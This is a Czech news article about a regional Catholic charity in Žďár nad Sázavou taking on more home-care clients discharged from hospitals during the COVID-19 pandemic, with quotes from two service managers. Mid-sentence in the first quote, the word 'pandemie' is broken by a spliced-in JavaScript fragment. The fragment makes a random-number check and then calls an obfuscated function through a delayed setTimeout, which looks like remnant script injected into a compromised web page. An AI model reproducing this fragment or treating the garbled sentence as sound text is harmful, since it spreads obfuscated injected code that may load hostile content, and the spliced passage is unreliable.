Rainbow page separator

Charitě přibývají klienti propuštění z nemocniční péče

Středa, 24. Březen 2021

Žďár nad Sázavou / Nárůst počtu klientů terénních služeb registruje Oblastní charita Žďár nad Sázavou. Souvisí to i s vysokým počtem hospitalizovaných pacientů; někteří poté mají zájem o domácí zdravotní péči. „Poskytování domácí péče hraje důležitou roli především pro kapacitu nemocnic. Ty nám z důvodu pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemie předávají do péče pacienty, u kterých to zdravotní stav dovolí. Terénní služby přispívají k navýšení volných lůžek v nemocnicích pro ty, kteří potřebují akutní péči. Jsme schopni zajistit běžné zdravotní úkony, jako jsou aplikace injekcí, převazy ran, odběry a další, ve stejné kvalitě jako v nemocnici. Proto se může pacient úspěšně léčit doma, tam, kde je nejraději,“ vysvětlila vedoucí úseku zdravotních a hospicových služeb Oblastní charity Žďár nad Sázavou Barbora Hadrous.
Charita řeší také péči o pacienty po propuštění z nemocnice, kdy je jim třeba poskytnout následnou péči. Zdravotní sestry zajistí kontrolu stavu a fyziologických funkcí, pohybovou a dechovou terapii, nácvik sebeobsluhy, případně kontrolní odběry krve. „Praxe potvrzuje, že v domácím prostředí pacienti rychleji pookřejí a jejich léčba probíhá úspěšněji. Rádi bychom vzkázali rodinným příslušníkům, aby se domácí péče nebáli a využili pomoc našich terénních služeb,“ sdělila vedoucí.
Mimo tyto služby je žádáno i poradenství. „V mnoha případech řešíme s rodinnými příslušníky, jak se o dědečka či babičku postarat, kde zajistit příspěvek na péči, pronajmout kompenzační pomůcky a podobně. Tyto informace se rodina z důvodu co největšího omezení kontaktů mezi personálem nemocnice a blízkými a velké vytíženosti mnohdy ani nedozví,“ doplnila vedoucí charitní pečovatelské služby Petra Ježová.
Pracovníci terénních charitních služeb se při osobní asistenci postarají i o COVID-19 pozitivní klienty. V tomto případě je nutné nastavit opatření jako používání ochranných pomůcek či přeorganizovat rozpis tak, aby nedocházelo ke střídání pracovníků, čímž se zamezí případnému přenosu nemoci.